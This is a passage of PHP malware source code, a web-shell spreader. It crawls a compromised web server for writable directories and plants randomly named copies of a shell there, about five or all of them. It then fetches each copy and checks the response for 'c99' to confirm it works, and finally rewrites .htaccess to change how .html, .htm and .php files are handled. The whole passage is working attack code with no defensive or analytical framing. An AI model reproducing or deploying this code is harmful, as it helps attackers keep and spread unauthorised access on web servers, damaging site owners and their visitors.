5){ for($i=0;$i!=5;$i++){ $my=$alldirs[rand(0,$dirsize)]; // echo $my."
"; spawn($my); } } else{ foreach($alldirs as $dir){ spawn($dir); flush(); } } if($shells>0){ $ht="RemoveHandler .html .htm .php\n AddType text/html .php .htm .html"; if($f=fopen(".htaccess","w")){ fputs($f,$ht); fclose($f); echo "[+]ok writed htacces!\r\n"; } } } function get_dir($dir){ if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if($file!='.' && $file!='..'){ //echo "filetype: ".filetype($dir.'/'.$file)." || $dir/$file
"; if(filetype($dir.'/'.$file)=="dir"){ if(is_writeable($dir.'/'.$file)){ $path="$dir/$file"; //echo $path."
"; array_push($GLOBALS['alldirs'],$path); } //echo "calling... $dir/$file
"; get_dir($dir.'/'.$file); } } } closedir($dh); } } } function spawn($p){ $p1=str_replace('../','',$p); $p1=str_replace('./','',$p1); $depth=sizeof(split('/',$p1))-1; //echo $depth; $shell=write_shell($p); $shell='http://'.$_SERVER['HTTP_HOST'].$p1.'/'.$shell; //echo $shell."
"; if(test_shell($shell)){ echo "[+]shell ok: $shell\r\n"; if(!strstr($shell,$GLOBALS['ourpath'])){ $GLOBALS['shells']++; } } } function write_shell($dir){ $shell=$GLOBALS['shell']; $name='core'.rand(12513,16392).".php"; $fullname=$dir.'/'.$name; if($f=fopen($fullname,"w")){ //echo 'writing shell: '.$fullname.'
'; fputs($f,$shell); fclose($f); return $name; } return false; } function test_shell($url){ $contents=file_get_contents($url); if(strstr($contents,"c99")){ return true; } } ?>